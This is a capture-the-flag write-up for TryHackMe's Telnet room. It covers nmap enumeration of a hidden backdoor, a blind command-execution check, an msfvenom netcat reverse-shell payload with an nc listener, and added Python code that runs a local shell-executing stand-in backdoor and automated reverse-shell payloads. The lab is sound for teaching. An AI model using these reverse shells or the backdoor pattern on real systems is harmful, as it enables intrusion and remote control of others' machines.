THM – Network Services – Telnet – Part 5

Last Updated on January 25, 2022 by aghanim

Understanding telnet 

What is telnet? 

Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that’s hosting a telnet server.

The telnet client establishes a connection with the server and then acts as a virtual terminal, allowing you to interact with the remote host.

Replacement 

Telnet sends all messages in clear text and has no security mechanisms of its own. In most applications and services it has therefore been replaced by SSH.

How does Telnet work?  

The user connects to the server with the Telnet protocol by entering telnet at a command prompt, then runs commands on the server from the Telnet prompt. You connect to a telnet server with the following syntax:

telnet IP PORT

The lack of what means that all Telnet communication is in plaintext? Encryption

Enumerating Telnet 

Use Nmap to scan the target machine for open ports and services. Because the telnet service here is not on its standard port (23), scan the full port range (-p-) and enable version detection (-sV) so the banner is shown.

How many ports are open on the machine? One

What port is that? 8012. Telnet is running on a non-standard port here (its assigned port is 23).

Based on the title returned to us, what do we think this port could be used for? A backdoor (SKIDY’s BACKDOOR) 

Who could it belong to? Skidy 
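As an added example (not from the original notes and not TryHackMe's code), the triage of a grepable scan result in Python. It assumes the scan was run as nmap -sV -p- -oG scan.gnmap IP, parses the Ports: records of the -oG format, and flags open services whose name or banner looks like telnet or a backdoor but that do not sit on port 23. The embedded scan record is constructed to mirror the room's result (one open port, 8012, with the backdoor banner); the host address and the exact banner text are placeholders, not captured output.

```python
# Added example, not from the original notes: parse nmap grepable output (-oG) of a
# full-range service scan and flag telnet-like or backdoor-like services that sit on
# a port other than telnet's assigned 23. SAMPLE_GNMAP is constructed to resemble the
# room's result; host address and banner text are placeholders, not captured output.
import re
from typing import List, NamedTuple

SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sV -p- -oG scan.gnmap 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 8012/open/tcp//unknown//SKIDY'S BACKDOOR/\tIgnored State: closed (65534)
"""

class Port(NamedTuple):
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str   # nmap's version/banner field; empty when -sV learned nothing

def parse_gnmap(text: str) -> List[Port]:
    """Parse the 'Ports:' records of nmap -oG output.

    A Host line holds tab-separated 'Name: value' fields; the Ports value is a
    ', '-separated list of port/state/proto/owner/service/rpcinfo/version/ records."""
    ports = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]
        for rec in fields["Ports"].split(", "):
            p = rec.strip().split("/")
            if len(p) >= 7:
                ports.append(Port(host, int(p[0]), p[2], p[1], p[4], p[6]))
    return ports

TELNET_PORT = 23
TELNET_LIKE = re.compile(r"telnet|backdoor", re.I)

def flag_telnet_like(ports: List[Port]) -> List[str]:
    """One finding per open port whose service name or banner looks like telnet or a
    backdoor and that is not on 23; these deserve a manual `telnet HOST PORT`."""
    findings = []
    for p in ports:
        if p.state == "open" and p.port != TELNET_PORT and TELNET_LIKE.search(f"{p.service} {p.version}"):
            findings.append(f"{p.host}:{p.port}/{p.proto} service={p.service!r} banner={p.version!r} "
                            f"-> non-standard port, connect with: telnet {p.host} {p.port}")
    return findings

if __name__ == "__main__":
    for finding in flag_telnet_like(parse_gnmap(SAMPLE_GNMAP)):
        print(finding)
```

Point parse_gnmap at the contents of your own scan.gnmap; the owner and rpcinfo fields are empty in modern nmap output, which is why the record split yields empty strings at those positions.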

Exploiting telnet 

Telnet, as a protocol, is insecure in and of itself because it lacks encryption: it sends all communication in plaintext and has poor access control. There are CVEs for both Telnet client and server software. A CVE (Common Vulnerabilities and Exposures) entry is a publicly disclosed computer security flaw with a standard identifier.

In practice you are far more likely to find a misconfiguration in how telnet has been set up or is operating that lets you exploit it.

Method breakdown 

From our enumeration we know: 

  • There is a poorly hidden telnet service running on the machine.
  • The service itself is marked “backdoor.”
  • A possible username, “Skidy”, is implicated.

Connecting to telnet 

Connect to telnet using the command telnet IP PORT

What is a reverse shell? 

A “shell” can simply be described as a piece of code or a program that is used to gain code or command execution on a device.

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.

The attacking machine has a listening port on which it receives the connection, giving it code or command execution on the target.

Connect to this telnet port. What welcome message do we receive? SKIDY’s backdoor 

When executing commands, do we get any output back in the telnet session? No

Let’s check to see if what we’re typing is being executed as a system command. 

Start a tcpdump listener on your local machine that captures only ICMP. The backslash is needed because icmp is also a tcpdump keyword, and it is doubled so the shell passes it through to tcpdump (sudo tcpdump icmp -i eth0 is an equivalent filter). Use the interface your THM IP is on: eth0 on the AttackBox, tun0 if you are connected through the VPN.

sudo tcpdump ip proto \\icmp -i eth0

In the telnet session, run ping <your THM IP> -c 1. Do we receive any pings? Yes

This means we’re able to execute system commands AND that we are able to reach our local machine.  

We’re going to generate a reverse shell payload using msfvenom. This produces a netcat reverse shell one-liner for us. Syntax:

msfvenom -p cmd/unix/reverse_netcat lhost=local_IP lport=4444 R

-p = payload

lhost = our local (attacking) machine’s IP

lport = the port to listen on (this is the port on your machine)

R = output the payload in raw format

The payload is generated. Now start a netcat listener on our local machine on the same port (add -n to skip DNS lookups if you like). We use this command:

nc -lvp 4444

With the listener running, copy and paste the msfvenom payload into the telnet session and run it as a command. The target connects back to the listener and you get a shell.
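The whole procedure above, from banner to blind command check to caught reverse shell, as an added Python example (not the notes' own code and not TryHackMe's). It runs against a constructed stand-in for the backdoor on 127.0.0.1 that executes each received line with /bin/sh and returns nothing, which is the behaviour the room shows. Two substitutions, both assumptions for the demo: the out-of-band check uses a TCP connect-back to our own listener instead of ping plus tcpdump (same principle, no root needed), and the reverse-shell payload is a python one-liner instead of the msfvenom netcat one, because the stand-in runs where the python interpreter is known to exist. The SKIDY'S BACKDOOR banner string, the ports and the payload strings are likewise assumptions. Against the real lab machine you would keep the page's commands and reuse only telnet_command and callback with your THM IP as the listener address.

```python
# Added example, not code from the original notes or from TryHackMe: the room's
# steps replayed in-process against a constructed stand-in for the backdoor.
# Out-of-band signal: a TCP connect-back to our listener instead of ping + tcpdump
# (same idea, no root needed). Reverse shell: a python one-liner instead of the
# msfvenom netcat payload, because the stand-in runs where python is known to exist.
import re, shlex, socket, subprocess, sys, threading, time

FAKE_BANNER = b"SKIDY'S BACKDOOR\n"  # constructed stand-in for the lab's greeting
# IAC IAC | IAC WILL/WONT/DO/DONT <opt> | IAC SB ... IAC SE | IAC <other 1-byte cmd>
IAC_SEQ = re.compile(rb"\xff(?:\xff|[\xfb-\xfe].|\xfa.*?\xff\xf0|.)", re.S)

def strip_iac(data: bytes) -> bytes:
    """Drop telnet option negotiation; an escaped IAC IAC stays as one 0xff byte."""
    return IAC_SEQ.sub(lambda m: b"\xff" if m.group() == b"\xff\xff" else b"", data)

def recv_quiet(sock, quiet):
    """Telnet has no framing: read until the peer has been silent for `quiet` s."""
    sock.settimeout(quiet)
    buf = b""
    try:
        while chunk := sock.recv(4096):
            buf += chunk
    except socket.timeout:
        pass
    return buf

def telnet_command(host, port, command, quiet=1.0):
    """Connect, collect the banner, send one line, return (banner, output)."""
    with socket.create_connection((host, port), timeout=5) as s:
        banner = strip_iac(recv_quiet(s, quiet))
        s.sendall(command.encode() + b"\r\n")
        return banner, strip_iac(recv_quiet(s, quiet))

def listener(timeout=None):
    """Listening TCP socket on an ephemeral 127.0.0.1 port; returns (sock, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0)); srv.listen(5); srv.settimeout(timeout)
    return srv, srv.getsockname()[1]

def callback(host, port, cmd_template, probe=None, expect=b"", timeout=10.0):
    """Send cmd_template ({port} = our listener) via the backdoor and wait for the target
    to connect back. probe=None: return whether it did (blind execution confirmed).
    Otherwise treat the callback as a shell: run `probe`, return output once `expect` shows."""
    srv, lport = listener(timeout)
    try:
        telnet_command(host, port, cmd_template.format(port=lport), quiet=0.2)
        conn, _ = srv.accept()
    except socket.timeout:
        return False if probe is None else ""
    finally:
        srv.close()
    with conn:
        if probe is None:
            return True
        conn.sendall(probe.encode() + b"\n")
        conn.settimeout(0.5)
        out, deadline = b"", time.monotonic() + timeout
        while expect not in out and time.monotonic() < deadline:
            try:
                chunk = conn.recv(4096)
            except socket.timeout:
                continue
            if not chunk:
                break
            out += chunk
        conn.sendall(b"exit\n")
    return out.decode(errors="replace")

def start_fake_backdoor():
    """Constructed stand-in: greet, run each line with /bin/sh, discard all output."""
    srv, port = listener()

    def handle(conn):
        with conn:
            conn.sendall(FAKE_BANNER)
            buf = b""
            while chunk := conn.recv(4096):
                buf += chunk
                while b"\n" in buf:
                    line, buf = buf.split(b"\n", 1)
                    if line.strip():
                        subprocess.Popen(line.strip().decode(errors="replace"), shell=True,
                                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

    def serve():
        while True:
            threading.Thread(target=handle, args=(srv.accept()[0],), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return port

# Payloads typed into the session; {port} is filled with our listener's port.
PY = shlex.quote(sys.executable)
CALLBACK = PY + " -c 'import socket;socket.create_connection((\"127.0.0.1\",{port})).close()'"
REVSHELL = (PY + " -c 'import socket,os,subprocess;s=socket.create_connection((\"127.0.0.1\",{port}));"
            "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call([\"/bin/sh\",\"-i\"])'")

def demo(host="127.0.0.1", port=None):
    """Banner -> blind command -> connect-back check -> reverse shell; returns what was seen."""
    port = port or start_fake_backdoor()
    banner, output = telnet_command(host, port, "id", quiet=0.5)
    blind = callback(host, port, CALLBACK)
    shell = callback(host, port, REVSHELL, probe="echo SHELL_OK", expect=b"SHELL_OK") if blind else ""
    return {"banner": banner, "output": output, "blind_exec": blind, "shell": shell}
```

Running demo() reproduces the room's observations in order: a banner but empty output for "id", a successful connect-back proving the typed text is executed as a shell command, and then the probe's output read through the caught shell. The strip_iac step matters against a real telnet daemon, which opens with IAC option negotiation that would otherwise pollute the banner; a netcat-style backdoor like the lab's sends none.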

Catch the flag!
